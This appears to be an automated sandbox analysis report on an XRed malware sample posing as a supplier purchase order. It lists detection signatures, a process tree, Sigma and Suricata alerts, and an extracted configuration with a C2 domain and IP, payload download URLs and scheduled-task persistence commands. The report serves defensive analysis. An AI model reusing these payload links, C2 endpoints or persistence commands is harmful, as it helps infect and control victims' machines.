Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New PO - Supplier 16-12-2024-Pdf.exe

Overview

General Information

Sample name:New PO - Supplier 16-12-2024-Pdf.exe
Analysis ID:1582347
MD5:38d3095d1b748cd53c65395718d7c5f4
SHA1:3c0221471b641a641a9141a731f6ee09663e6538
SHA256:f3724bf49bfd8d11ef1f81b4c6aebc4d3281cecfa357d4fb3ae388a4add242e6
Tags:exeknkbkk212user-JAMESWT_MHT
Infos:

Detection

XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected ProcessChecker

Classification

Process Tree

  • System is w10x64
  • New PO - Supplier 16-12-2024-Pdf.exe (PID: 1472 cmdline: "C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe" MD5: 38D3095D1B748CD53C65395718D7C5F4)
    • ._cache_New PO - Supplier 16-12-2024-Pdf.exe (PID: 7080 cmdline: "C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe" MD5: DF6FA61AC1509C2D8B720690829D5634)
      • cmd.exe (PID: 3604 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 6508 cmdline: schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 2188 cmdline: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 4508 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: ACA4D70521DE30563F4F2501D4D686A5)
      • WerFault.exe (PID: 8148 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 8704 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 3180 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • TXAASJ.exe (PID: 2300 cmdline: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe MD5: DF6FA61AC1509C2D8B720690829D5634)
  • Synaptics.exe (PID: 1472 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: ACA4D70521DE30563F4F2501D4D686A5)
  • TXAASJ.exe (PID: 7556 cmdline: "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe" MD5: DF6FA61AC1509C2D8B720690829D5634)
  • TXAASJ.exe (PID: 7924 cmdline: "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe" MD5: DF6FA61AC1509C2D8B720690829D5634)
  • TXAASJ.exe (PID: 5760 cmdline: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe MD5: DF6FA61AC1509C2D8B720690829D5634)
  • TXAASJ.exe (PID: 8004 cmdline: "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe" MD5: DF6FA61AC1509C2D8B720690829D5634)
  • TXAASJ.exe (PID: 7176 cmdline: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe MD5: DF6FA61AC1509C2D8B720690829D5634)
  • cleanup

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
New PO - Supplier 16-12-2024-Pdf.exeJoeSecurity_XRedYara detected XRedJoe Security
    New PO - Supplier 16-12-2024-Pdf.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\BBLXFG.vbsJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
        C:\Users\user\Documents\IPKGELNTQY\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
          C:\Users\user\Documents\IPKGELNTQY\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            C:\ProgramData\Synaptics\RCX6FCE.tmpJoeSecurity_XRedYara detected XRedJoe Security
              C:\ProgramData\Synaptics\RCX6FCE.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                Click to see the 2 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000007.00000002.3396869708.00000000007F8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                  00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                    00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                      00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                        00000007.00000002.3397773164.0000000002C10000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                          Click to see the 4 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.New PO - Supplier 16-12-2024-Pdf.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                            0.0.New PO - Supplier 16-12-2024-Pdf.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Potentially Suspicious Malware Callback Communication
                              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe, Initiated: true, ProcessId: 7080, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49769
                              Sigma detected: Script Interpreter Execution From Suspicious Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe" , ParentImage: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe, ParentProcessId: 7080, ParentProcessName: ._cache_New PO - Supplier 16-12-2024-Pdf.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, ProcessId: 2188, ProcessName: wscript.exe
                              Sigma detected: Suspicious Script Execution From Temp Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe" , ParentImage: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe, ParentProcessId: 7080, ParentProcessName: ._cache_New PO - Supplier 16-12-2024-Pdf.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, ProcessId: 2188, ProcessName: wscript.exe
                              Sigma detected: WScript or CScript Dropper
                              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe" , ParentImage: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe, ParentProcessId: 7080, ParentProcessName: ._cache_New PO - Supplier 16-12-2024-Pdf.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, ProcessId: 2188, ProcessName: wscript.exe
                              Sigma detected: CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe, ProcessId: 7080, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BBLXFG
                              Sigma detected: Startup Folder File Write
                              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe, ProcessId: 7080, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BBLXFG.lnk
                              Sigma detected: Suspicious Schtasks From Env Var Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1, CommandLine: schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3604, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1, ProcessId: 6508, ProcessName: schtasks.exe
                              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                              Source: Process startedAuthor: Michael Haag: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe" , ParentImage: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe, ParentProcessId: 7080, ParentProcessName: ._cache_New PO - Supplier 16-12-2024-Pdf.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, ProcessId: 2188, ProcessName: wscript.exe
                              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe, ProcessId: 1472, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                              Sigma detected: Office Macro File Creation
                              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 4508, TargetFilename: C:\Users\user\AppData\Local\Temp\NEnoihuS.xlsm

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:40:38.133447+010020448871A Network Trojan was detected192.168.2.649741142.250.185.78443TCP
                              2024-12-30T11:40:38.137980+010020448871A Network Trojan was detected192.168.2.649742142.250.185.78443TCP
                              2024-12-30T11:40:39.112067+010020448871A Network Trojan was detected192.168.2.649759142.250.185.78443TCP
                              2024-12-30T11:40:39.189594+010020448871A Network Trojan was detected192.168.2.649760142.250.185.78443TCP
                              2024-12-30T11:40:40.089973+010020448871A Network Trojan was detected192.168.2.649774142.250.185.78443TCP
                              2024-12-30T11:40:40.171848+010020448871A Network Trojan was detected192.168.2.649777142.250.185.78443TCP
                              2024-12-30T11:40:41.075058+010020448871A Network Trojan was detected192.168.2.649787142.250.185.78443TCP
                              2024-12-30T11:40:41.144474+010020448871A Network Trojan was detected192.168.2.649788142.250.185.78443TCP
                              2024-12-30T11:40:41.819656+010020448871A Network Trojan was detected192.168.2.649800142.250.185.78443TCP
                              2024-12-30T11:40:41.819674+010020448871A Network Trojan was detected192.168.2.649799142.250.185.78443TCP
                              2024-12-30T11:40:43.017703+010020448871A Network Trojan was detected192.168.2.649811142.250.185.78443TCP
                              2024-12-30T11:40:43.044161+010020448871A Network Trojan was detected192.168.2.649812142.250.185.78443TCP
                              2024-12-30T11:40:43.992346+010020448871A Network Trojan was detected192.168.2.649820142.250.185.78443TCP
                              2024-12-30T11:40:44.030374+010020448871A Network Trojan was detected192.168.2.649823142.250.185.78443TCP
                              2024-12-30T11:40:44.971009+010020448871A Network Trojan was detected192.168.2.649832142.250.185.78443TCP
                              2024-12-30T11:40:45.029995+010020448871A Network Trojan was detected192.168.2.649833142.250.185.78443TCP
                              2024-12-30T11:40:45.835070+010020448871A Network Trojan was detected192.168.2.649845142.250.185.78443TCP
                              2024-12-30T11:40:45.835091+010020448871A Network Trojan was detected192.168.2.649846142.250.185.78443TCP
                              2024-12-30T11:40:46.814532+010020448871A Network Trojan was detected192.168.2.649855142.250.185.78443TCP
                              2024-12-30T11:40:46.819390+010020448871A Network Trojan was detected192.168.2.649854142.250.185.78443TCP
                              2024-12-30T11:40:47.796295+010020448871A Network Trojan was detected192.168.2.649864142.250.185.78443TCP
                              2024-12-30T11:40:47.798664+010020448871A Network Trojan was detected192.168.2.649862142.250.185.78443TCP
                              2024-12-30T11:40:48.846936+010020448871A Network Trojan was detected192.168.2.649870142.250.185.78443TCP
                              2024-12-30T11:40:48.868177+010020448871A Network Trojan was detected192.168.2.649871142.250.185.78443TCP
                              2024-12-30T11:40:49.845147+010020448871A Network Trojan was detected192.168.2.649881142.250.185.78443TCP
                              2024-12-30T11:40:49.845167+010020448871A Network Trojan was detected192.168.2.649880142.250.185.78443TCP
                              2024-12-30T11:40:50.824294+010020448871A Network Trojan was detected192.168.2.649893142.250.185.78443TCP
                              2024-12-30T11:40:50.838760+010020448871A Network Trojan was detected192.168.2.649894142.250.185.78443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:40:48.309364+010028221161Malware Command and Control Activity Detected192.168.2.649876172.111.138.1005552TCP
                              2024-12-30T11:41:24.558784+010028221161Malware Command and Control Activity Detected192.168.2.650146172.111.138.1005552TCP
                              2024-12-30T11:42:00.812107+010028221161Malware Command and Control Activity Detected192.168.2.650154172.111.138.1005552TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:40:37.786370+010028326171Malware Command and Control Activity Detected192.168.2.64975169.42.215.25280TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:40:20.115020+010028498851Malware Command and Control Activity Detected192.168.2.650146172.111.138.1005552TCP
                              2024-12-30T11:40:20.115020+010028498851Malware Command and Control Activity Detected192.168.2.650153172.111.138.1005552TCP
                              2024-12-30T11:40:20.115020+010028498851Malware Command and Control Activity Detected192.168.2.650147172.111.138.1005552TCP
                              2024-12-30T11:40:20.115020+010028498851Malware Command and Control Activity Detected192.168.2.649876172.111.138.1005552TCP
                              2024-12-30T11:40:20.115020+010028498851Malware Command and Control Activity Detected192.168.2.650073172.111.138.1005552TCP
                              2024-12-30T11:40:20.115020+010028498851Malware Command and Control Activity Detected192.168.2.650150172.111.138.1005552TCP
                              2024-12-30T11:40:20.115020+010028498851Malware Command and Control Activity Detected192.168.2.649971172.111.138.1005552TCP
                              2024-12-30T11:40:20.115020+010028498851Malware Command and Control Activity Detected192.168.2.650154172.111.138.1005552TCP
                              2024-12-30T11:40:20.115020+010028498851Malware Command and Control Activity Detected192.168.2.649769172.111.138.1005552TCP
                              2024-12-30T11:40:20.115020+010028498851Malware Command and Control Activity Detected192.168.2.650139172.111.138.1005552TCP
                              2024-12-30T11:40:38.873446+010028498851Malware Command and Control Activity Detected192.168.2.649769172.111.138.1005552TCP
                              2024-12-30T11:40:48.309364+010028498851Malware Command and Control Activity Detected192.168.2.649876172.111.138.1005552TCP
                              2024-12-30T11:40:57.339980+010028498851Malware Command and Control Activity Detected192.168.2.649971172.111.138.1005552TCP
                              2024-12-30T11:41:06.418992+010028498851Malware Command and Control Activity Detected192.168.2.650073172.111.138.1005552TCP
                              2024-12-30T11:41:15.471082+010028498851Malware Command and Control Activity Detected192.168.2.650139172.111.138.1005552TCP
                              2024-12-30T11:41:24.558784+010028498851Malware Command and Control Activity Detected192.168.2.650146172.111.138.1005552TCP
                              2024-12-30T11:41:33.611749+010028498851Malware Command and Control Activity Detected192.168.2.650147172.111.138.1005552TCP
                              2024-12-30T11:41:42.699043+010028498851Malware Command and Control Activity Detected192.168.2.650150172.111.138.1005552TCP
                              2024-12-30T11:41:51.761479+010028498851Malware Command and Control Activity Detected192.168.2.650153172.111.138.1005552TCP
                              2024-12-30T11:42:00.812107+010028498851Malware Command and Control Activity Detected192.168.2.650154172.111.138.1005552TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: New PO - Supplier 16-12-2024-Pdf.exeAvira: detected
                              Source: New PO - Supplier 16-12-2024-Pdf.exeAvira: detected
                              Source: New PO - Supplier 16-12-2024-Pdf.exeAvira: detected
                              Antivirus detection for URL or domain
                              Source: http://xred.site50.net/syn/SUpdate.ini0Avira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/SSLLibrary.dlAvira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                              Source: C:\ProgramData\Synaptics\RCX6FCE.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\RCX6FCE.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\Users\user\AppData\Local\Temp\BBLXFG.vbsAvira: detection malicious, Label: VBS/Runner.VPJI
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                              Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Found malware configuration
                              Source: New PO - Supplier 16-12-2024-Pdf.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                              Multi AV Scanner detection for dropped file
                              Source: C:\ProgramData\Synaptics\RCX6FCE.tmpReversingLabs: Detection: 91%
                              Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeReversingLabs: Detection: 86%
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeReversingLabs: Detection: 86%
                              Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1ReversingLabs: Detection: 91%
                              Multi AV Scanner detection for submitted file
                              Source: New PO - Supplier 16-12-2024-Pdf.exeVirustotal: Detection: 80%Perma Link
                              Source: New PO - Supplier 16-12-2024-Pdf.exeReversingLabs: Detection: 92%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.6% probability
                              Machine Learning detection for dropped file
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeJoe Sandbox ML: detected
                              Source: C:\ProgramData\Synaptics\RCX6FCE.tmpJoe Sandbox ML: detected
                              Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1Joe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: New PO - Supplier 16-12-2024-Pdf.exeJoe Sandbox ML: detected
                              Source: New PO - Supplier 16-12-2024-Pdf.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49741 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49742 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49759 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49761 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49762 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49760 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49774 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49777 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49789 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49799 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49800 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49820 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49821 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49822 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49823 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49861 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49863 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49880 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49881 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49904 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49905 version: TLS 1.2
